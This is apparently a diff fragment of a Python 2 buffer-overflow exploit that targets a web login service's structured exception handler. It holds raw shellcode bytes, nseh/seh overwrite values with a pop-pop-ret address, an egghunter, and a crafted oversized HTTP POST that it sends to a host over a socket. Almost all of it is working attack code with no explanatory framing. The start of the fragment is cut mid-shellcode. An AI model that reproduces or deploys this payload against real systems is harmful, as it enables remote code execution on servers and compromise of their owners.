+buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
+buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
+buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
+buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
+buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
+buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
+buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
+
+
+#pop pop ret 10015BFE
+
+nseh = "\x90\x90\xEB\x0B"
+seh = "\xFE\x5B\x01\x10"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+evil = "POST /login HTTP/1.1\r\n"
+evil += "Host: 192.168.123.132\r\n"
+evil += "User-Agent: Mozilla/5.0\r\n"
+evil += "Connection: close\r\n"
+evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+evil += "Accept-Language: en-us,en;q=0.5\r\n"
+evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
+evil += "Keep-Alive: 300\r\n"
+evil += "Proxy-Connection: keep-alive\r\n"
+evil += "Content-Type: application/x-www-form-urlencoded\r\n"
+evil += "Content-Length: 17000\r\n\r\n"
+evil += "username=admin"
+evil += "&password=aaaaa\r\n"
+evil += "\x41" * 13664 #subtract/add for payload
+evil += "B" * 100
+evil += "w00tw00t"
+evil += buf
+evil += "\x90" * 212
+evil += nseh
+evil += seh
+evil += "\x90" * 10
+evil += egghunter
+evil += "\x90" * 8672
+
+
+print 'Sending evil buffer...'
+s.send(evil)
+print 'Payload Sent!'
+s.close()
+
+